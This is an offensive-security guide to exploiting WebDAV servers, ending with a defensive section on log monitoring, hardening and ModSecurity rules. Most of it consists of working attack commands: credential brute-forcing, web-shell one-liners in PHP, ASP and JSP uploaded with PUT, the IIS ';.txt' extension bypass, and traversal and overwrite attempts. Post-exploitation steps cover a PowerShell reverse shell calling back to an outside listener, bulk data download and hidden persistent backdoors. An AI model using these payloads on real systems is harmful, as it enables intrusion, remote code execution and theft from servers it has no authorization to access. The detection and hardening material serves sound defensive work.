WebDAV Service Attacks and Exploitation
WebDAV exploitation techniques including HTTP method abuse, file upload attacks, IIS extension bypass vulnerabilities, and authenticated access exploitation.
Introduction
Web Distributed Authoring and Versioning (WebDAV) is an extension to the HTTP protocol that allows clients to perform remote web content authoring operations. Originally defined in RFC 4918, WebDAV enables users to collaboratively edit and manage files on remote web servers through HTTP.
WebDAV security concerns stem from several factors:
- File manipulation capabilities: Upload, modify, delete files remotely
- Authentication weaknesses: Often uses HTTP Basic Authentication
- Misconfigured permissions: Excessive write access to web directories
- Web shell deployment: Upload and execute malicious scripts
- IIS-specific vulnerabilities: Extension bypass and parsing flaws
- Default credentials: Common in appliances and embedded systems
Why WebDAV is a High-Value Target
WebDAV exploitation frequently leads to immediate web server compromise:
- Direct file upload: Write files to web-accessible directories
- Web shell deployment: Execute arbitrary code via uploaded scripts
- Sensitive file access: Read configuration files and source code
- Credential harvesting: Access stored passwords and API keys
- Lateral movement: Use web server as pivot point
- IIS vulnerabilities: Historical bypass techniques still effective
Common WebDAV deployments:
- SharePoint: Microsoft collaboration platform
- OwnCloud/Nextcloud: Open-source file sharing
- Apache mod_dav: Linux web server module
- IIS WebDAV: Windows web server feature
- Network storage: NAS devices with WebDAV support
Technical Background
WebDAV HTTP Methods
WebDAV extends standard HTTP with additional methods:
| Method | Purpose | Risk Level |
|---|---|---|
| PUT | Upload/create files | High |
| DELETE | Remove files | High |
| COPY | Duplicate files | Medium |
| MOVE | Rename/relocate files | Medium |
| MKCOL | Create collections (directories) | Medium |
| PROPFIND | Retrieve properties | Low |
| PROPPATCH | Modify properties | Low |
| LOCK | Lock resource | Low |
| UNLOCK | Unlock resource | Low |
| OPTIONS | List supported methods | Info |
WebDAV Properties
WebDAV uses XML for property management:
<?xml version="1.0"?>
<D:propfind xmlns:D="DAV:">
<D:prop>
<D:displayname/>
<D:getcontentlength/>
<D:getcontenttype/>
<D:creationdate/>
<D:getlastmodified/>
</D:prop>
</D:propfind>
Authentication
WebDAV typically uses:
- HTTP Basic Authentication: Base64-encoded credentials
- Digest Authentication: MD5-hashed credentials
- NTLM Authentication: Windows integrated authentication
- Kerberos: Domain-based authentication
Common WebDAV Implementations
| Software | Platform | Default Port | Notes |
|---|---|---|---|
| IIS WebDAV | Windows | 80/443 | Vulnerable to extension bypass |
| Apache mod_dav | Linux | 80/443 | Requires authentication configuration |
| nginx ngx_http_dav | Linux | 80/443 | Minimal WebDAV support |
| SharePoint | Windows | 80/443 | Enterprise collaboration |
| OwnCloud | Linux/Windows | 80/443 | File sharing platform |
| SabreDAV | PHP | 80/443 | PHP WebDAV framework |
Enumeration
Detecting WebDAV
HTTP OPTIONS Method
# Check for WebDAV methods
curl -i -X OPTIONS http://10.10.11.45/
# Nmap WebDAV detection
nmap -p 80,443 --script http-webdav-scan 10.10.11.45
nmap -p 80,443 --script http-methods 10.10.11.45
# Check specific directory
curl -i -X OPTIONS http://10.10.11.45/webdav/
WebDAV Indicators:
HTTP/1.1 200 OK
Allow: OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
DAV: 1, 2
MS-Author-Via: DAV
PROPFIND Method
# Enumerate WebDAV directories
curl -i -X PROPFIND http://10.10.11.45/webdav/
# Using davtest
davtest -url http://10.10.11.45/webdav/
# Using Nmap
nmap -p 80 --script http-webdav-scan --script-args http-webdav-scan.root=/webdav/ 10.10.11.45
Common WebDAV Paths
# Test common WebDAV directories
for dir in webdav dav files documents shares upload uploads; do
curl -i -X OPTIONS http://10.10.11.45/$dir/
done
# Common paths on IIS
curl -i -X OPTIONS http://10.10.11.45/_vti_bin/
curl -i -X OPTIONS http://10.10.11.45/_private/
# SharePoint paths
curl -i -X OPTIONS http://10.10.11.45/_layouts/
curl -i -X OPTIONS http://10.10.11.45/_vti_inf.html
Exploitation Techniques
Authentication Attacks
Test Anonymous Access
# Test unauthenticated access
curl -i -X PUT http://10.10.11.45/webdav/test.txt -d "test content"
curl -i -X OPTIONS http://10.10.11.45/webdav/
# Using cadaver
cadaver http://10.10.11.45/webdav/
# Press Enter for blank username/password
Brute-Force Authentication
# Using Hydra
hydra -L users.txt -P passwords.txt 10.10.11.45 http-get /webdav/
# Using Medusa
medusa -h 10.10.11.45 -U users.txt -P passwords.txt -M http -m DIR:/webdav/
# Using Nmap
nmap -p 80 --script http-brute --script-args http-brute.path=/webdav/ 10.10.11.45
# Using Metasploit
msfconsole
msf6 > use auxiliary/scanner/http/http_login
msf6 auxiliary(scanner/http/http_login) > set RHOSTS 10.10.11.45
msf6 auxiliary(scanner/http/http_login) > set AUTH_URI /webdav/
msf6 auxiliary(scanner/http/http_login) > set USER_FILE users.txt
msf6 auxiliary(scanner/http/http_login) > set PASS_FILE passwords.txt
msf6 auxiliary(scanner/http/http_login) > run
Common Default Credentials:
admin:admin
root:root
test:test
webdav:webdav
user:password
File Upload Attacks
Test File Upload Permissions
# Using davtest (automated testing)
davtest -url http://10.10.11.45/webdav/ -auth user:password
# Manual PUT test
curl -i -X PUT http://10.10.11.45/webdav/test.txt -d "test content" -u user:password
# Upload HTML file
curl -i -X PUT http://10.10.11.45/webdav/test.html -d "<html><body>Test</body></html>" -u user:password
# Verify upload
curl http://10.10.11.45/webdav/test.html
Web Shell Upload
PHP Web Shell:
# Simple PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -i -X PUT http://10.10.11.45/webdav/shell.php --data-binary @shell.php -u user:password
# Access shell
curl "http://10.10.11.45/webdav/shell.php?cmd=whoami"
# Full-featured PHP shell
curl -i -X PUT http://10.10.11.45/webdav/shell.php --data-binary @/usr/share/webshells/php/php-reverse-shell.php -u user:password
ASP/ASPX Web Shell:
# ASP shell
echo '<% response.write(CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.ReadAll()) %>' > shell.asp
curl -i -X PUT http://10.10.11.45/webdav/shell.asp --data-binary @shell.asp -u user:password
# ASPX shell
curl -i -X PUT http://10.10.11.45/webdav/shell.aspx --data-binary @/usr/share/webshells/aspx/cmdasp.aspx -u user:password
# Access ASP shell
curl "http://10.10.11.45/webdav/shell.asp?cmd=whoami"
JSP Web Shell:
# JSP shell
curl -i -X PUT http://10.10.11.45/webdav/shell.jsp --data-binary @/usr/share/webshells/jsp/cmdjsp.jsp -u user:password
Using Cadaver
# Connect to WebDAV
cadaver http://10.10.11.45/webdav/
# Authentication
Username: user
Password: password
# Commands
dav:/webdav/> ls
dav:/webdav/> put shell.php
dav:/webdav/> get sensitive.txt
dav:/webdav/> mkcol uploads
dav:/webdav/> delete old_file.txt
dav:/webdav/> exit
IIS WebDAV Vulnerabilities
IIS 5.x/6.0 Extension Bypass
IIS 5/6 has a vulnerability where adding ;.txt bypasses extension restrictions:
# Upload .txt file
echo '<%@ Page Language="C#" %><%=System.Diagnostics.Process.Start("cmd.exe","/c " + Request.QueryString["cmd"]).StandardOutput.ReadToEnd()%>' > shell.txt
curl -i -X PUT http://10.10.11.45/webdav/shell.txt --data-binary @shell.txt -u user:password
# Move/Copy with .asp extension + ;.txt bypass
curl -i -X MOVE http://10.10.11.45/webdav/shell.txt \
-H "Destination: http://10.10.11.45/webdav/shell.asp;.txt" \
-u user:password
# Alternative using COPY
curl -i -X COPY http://10.10.11.45/webdav/shell.txt \
-H "Destination: http://10.10.11.45/webdav/shell.asp;.txt" \
-u user:password
# Access the shell (IIS executes it as .asp)
curl "http://10.10.11.45/webdav/shell.asp;.txt?cmd=whoami"
Alternative Extensions:
# These also work
shell.asp;.html
shell.asp;.jpg
shell.asp;.png
Using Cadaver for IIS Bypass
cadaver http://10.10.11.45/
Username: user
Password: password
# Upload .txt file
dav:/> put shell.txt
Uploading shell.txt to `/shell.txt':
Progress: [=============================>] 100.0% of 195 bytes succeeded.
# Move with bypass extension
dav:/> move shell.txt shell.asp;.txt
Moving `/shell.txt' to `/shell.asp;.txt': succeeded.
# Verify
dav:/> ls
shell.asp;.txt
# Access via browser or curl
# http://10.10.11.45/shell.asp;.txt?cmd=whoami
Automated IIS WebDAV Exploitation
# Using Metasploit
msfconsole
msf6 > use exploit/windows/iis/iis_webdav_upload_asp
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set RHOSTS 10.10.11.45
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpUsername user
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set HttpPassword password
msf6 exploit(windows/iis/iis_webdav_upload_asp) > set PATH /webdav/
msf6 exploit(windows/iis/iis_webdav_upload_asp) > exploit
Advanced Exploitation
Directory Traversal
# Attempt to write outside WebDAV directory
curl -i -X PUT "http://10.10.11.45/webdav/../shell.php" --data-binary @shell.php -u user:password
# Try various traversal techniques
curl -i -X PUT "http://10.10.11.45/webdav/..%2fshell.php" --data-binary @shell.php -u user:password
curl -i -X PUT "http://10.10.11.45/webdav/..%252fshell.php" --data-binary @shell.php -u user:password
File Overwrite Attack
# Overwrite index page
curl -i -X PUT http://10.10.11.45/webdav/index.html \
--data-binary @malicious.html \
-u user:password
# Overwrite configuration files (if permissions allow)
curl -i -X PUT http://10.10.11.45/webdav/../web.config \
--data-binary @web.config \
-u user:password
Lock Manipulation
# Lock a file
curl -i -X LOCK http://10.10.11.45/webdav/file.txt \
-H "Timeout: Infinite" \
-u user:password
# Unlock a file (DoS potential)
curl -i -X UNLOCK http://10.10.11.45/webdav/file.txt \
-H "Lock-Token: <opaquelocktoken:xxx>" \
-u user:password
Post-Exploitation
Web Shell Access
# Simple command execution
curl "http://10.10.11.45/webdav/shell.php?cmd=whoami"
curl "http://10.10.11.45/webdav/shell.php?cmd=ipconfig"
# Multi-line output
curl "http://10.10.11.45/webdav/shell.php?cmd=dir+C:\\"
# Download sensitive files
curl "http://10.10.11.45/webdav/shell.php?cmd=type+C:\\inetpub\\wwwroot\\web.config"
# Reverse shell
# Start listener
nc -lvnp 4444
# Trigger reverse shell
curl "http://10.10.11.45/webdav/shell.php?cmd=powershell+-c+\$client=New-Object+System.Net.Sockets.TCPClient('10.10.14.5',4444);\$stream=\$client.GetStream();[byte[]]\$bytes=0..65535|%%{0};while((\$i=\$stream.Read(\$bytes,0,\$bytes.Length))+-ne+0){;\$data=(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback=(iex+\$data+2>&1+|+Out-String+);\$sendback2=\$sendback+'PS+'+(pwd).Path+'>';+\$sendbyte=([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"
Data Exfiltration
# Using cadaver to download files
cadaver http://10.10.11.45/webdav/ -u user -p password
dav:/webdav/> ls
dav:/webdav/> get database_backup.sql
dav:/webdav/> mget *.config
# Recursive download
wget -r --user=user --password=password http://10.10.11.45/webdav/
# Using curl for batch download
for file in $(curl -s -u user:password http://10.10.11.45/webdav/ | grep -oP '(?<=href=")[^"]+'); do
curl -u user:password -O "http://10.10.11.45/webdav/$file"
done
Persistence
# Upload persistent web shell with obfuscation
curl -i -X PUT http://10.10.11.45/webdav/error.php \
--data-binary @persistent_shell.php \
-u user:password
# Upload to less obvious location
curl -i -X PUT http://10.10.11.45/webdav/images/logo.php \
--data-binary @shell.php \
-u user:password
# Backdoor in common file
curl -i -X PUT http://10.10.11.45/webdav/404.php \
--data-binary @shell.php \
-u user:password
Detection and Defense
Monitoring WebDAV Activity
Apache Logs:
# Monitor for WebDAV methods
tail -f /var/log/apache2/access.log | grep -E "PUT|DELETE|COPY|MOVE|MKCOL"
# Detect file uploads
grep "PUT" /var/log/apache2/access.log | grep -E "\.php|\.asp|\.jsp"
# Failed authentication attempts
grep "401" /var/log/apache2/access.log | grep "webdav"
IIS Logs:
# PowerShell log analysis
Get-Content C:\inetpub\logs\LogFiles\W3SVC1\*.log | Select-String "PUT|DELETE|MOVE|COPY"
# Detect shell uploads
Get-Content C:\inetpub\logs\LogFiles\W3SVC1\*.log | Select-String "shell|cmd|exec"
Hardening WebDAV
Disable WebDAV if Not Needed
Apache:
# Disable mod_dav (dav_fs depends on dav, so disable dav_fs first)
sudo a2dismod dav_fs
sudo a2dismod dav
sudo systemctl restart apache2
IIS:
# Disable WebDAV feature
Remove-WindowsFeature Web-DAV-Publishing
# Or via IIS Manager
# Server Manager → Remove Roles and Features → Web Server (IIS) → WebDAV Publishing
Restrict WebDAV Methods
Apache (/etc/apache2/sites-available/webdav.conf):
<Directory /var/www/webdav>
# Allow only safe methods
<LimitExcept GET POST OPTIONS PROPFIND>
Require all denied
</LimitExcept>
# Block dangerous methods
<Limit PUT DELETE COPY MOVE MKCOL PROPPATCH LOCK UNLOCK>
Require all denied
</Limit>
</Directory>
IIS (web.config):
<system.webServer>
<security>
<requestFiltering>
<verbs>
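<!-- Request filtering denies a verb with allowed="false"; <remove> only drops a list entry and does not block the verb -->
<add verb="PUT" allowed="false" />
<add verb="DELETE" allowed="false" />
<add verb="COPY" allowed="false" />
<add verb="MOVE" allowed="false" />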
</verbs>
</requestFiltering>
</security>
</system.webServer>
Implement Strong Authentication
Apache:
<Directory /var/www/webdav>
AuthType Digest
AuthName "WebDAV"
AuthDigestProvider file
AuthUserFile /etc/apache2/webdav.digest
Require valid-user
</Directory>
Create digest password file:
sudo htdigest -c /etc/apache2/webdav.digest "WebDAV" username
File Type Restrictions
Apache:
<Directory /var/www/webdav>
# Block executable uploads
<FilesMatch "\.(php|php3|php4|php5|phtml|asp|aspx|jsp|exe|bat|sh)$">
Require all denied
</FilesMatch>
</Directory>
IIS:
<system.webServer>
<security>
<requestFiltering>
<fileExtensions>
<add fileExtension=".asp" allowed="false" />
<add fileExtension=".aspx" allowed="false" />
<add fileExtension=".php" allowed="false" />
<add fileExtension=".exe" allowed="false" />
</fileExtensions>
</requestFiltering>
</security>
</system.webServer>
Network Access Control
# Firewall rules - restrict WebDAV to internal network
sudo ufw allow from 10.10.10.0/24 to any port 80
sudo ufw deny from any to any port 80
# Apache IP restrictions
<Directory /var/www/webdav>
Require ip 10.10.10.0/24
Require ip 192.168.1.0/24
</Directory>
Intrusion Detection
# ModSecurity rule for WebDAV methods
SecRule REQUEST_METHOD "@rx ^(PUT|DELETE|COPY|MOVE|MKCOL|PROPFIND|PROPPATCH|LOCK|UNLOCK)$" \
"id:1000,phase:1,deny,status:403,msg:'WebDAV method blocked'"
# Block common web shell patterns
SecRule REQUEST_FILENAME "@rx \.(php|asp|aspx|jsp)[^/]*$" \
"id:1001,phase:1,deny,status:403,msg:'Suspicious file upload blocked'"
# Detect shell.* uploads
SecRule REQUEST_FILENAME "@rx shell\." \
"id:1002,phase:1,deny,status:403,msg:'Shell upload detected'"
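The log checks under Monitoring WebDAV Activity and the filename patterns above can be combined into one pass over an access log. The following is an added example, not code from the original page: it assumes Apache's combined log format, the log lines are constructed samples, and the names `analyze`, `SCRIPT_NAME` and `SUFFIX_ONLY` are hypothetical. It also shows that the `$`-anchored pattern from the FilesMatch block does not match a name such as `shell.asp;.txt`, while the pattern from ModSecurity rule 1001 does.

```python
import re
from collections import Counter

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2024:10:01:02 +0000] "OPTIONS /webdav/ HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.5 - - [12/Mar/2024:10:01:09 +0000] "PUT /webdav/test.txt HTTP/1.1" 401 381 "-" "curl/8.5.0"
10.10.14.5 - - [12/Mar/2024:10:01:10 +0000] "PUT /webdav/test.txt HTTP/1.1" 401 381 "-" "curl/8.5.0"
10.10.14.5 - - [12/Mar/2024:10:01:11 +0000] "PUT /webdav/test.txt HTTP/1.1" 401 381 "-" "curl/8.5.0"
10.10.14.5 - user [12/Mar/2024:10:02:30 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 0 "-" "curl/8.5.0"
10.10.14.5 - user [12/Mar/2024:10:02:41 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 0 "-" "curl/8.5.0"
10.10.14.5 - user [12/Mar/2024:10:03:05 +0000] "GET /webdav/shell.asp;.txt?cmd=whoami HTTP/1.1" 200 12 "-" "curl/8.5.0"
10.10.10.7 - alice [12/Mar/2024:10:04:00 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 512 "-" "davfs2/1.6"
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH"}
# Pattern from the page's ModSecurity rule 1001: script extension anywhere in the last segment.
SCRIPT_NAME = re.compile(r"\.(php|asp|aspx|jsp)[^/]*$", re.I)
# Pattern from the page's FilesMatch block: script extension only at the very end.
SUFFIX_ONLY = re.compile(r"\.(php|php3|php4|php5|phtml|asp|aspx|jsp|exe|bat|sh)$", re.I)

def analyze(log_text, fail_threshold=3):
    """Return (kind, client_ip, method, detail) tuples for suspicious WebDAV activity."""
    findings, failures = [], Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, _user, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # drop the query string before matching names
        if status == "401":
            failures[ip] += 1
        if method in WRITE_METHODS and status.startswith("2") and SCRIPT_NAME.search(path):
            findings.append(("script-write", ip, method, path))
        elif SCRIPT_NAME.search(path) and not SUFFIX_ONLY.search(path):
            # e.g. name.asp;.txt: invisible to a suffix-only extension filter
            findings.append(("extension-bypass-name", ip, method, path))
    for ip, count in failures.items():
        if count >= fail_threshold:
            findings.append(("auth-failures", ip, "*", f"{count} x 401"))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The combined format does not record the `Destination` header, so a MOVE or COPY to a new name is only visible once that name is requested; adding `%{Destination}i` to the Apache `LogFormat` records the target directly.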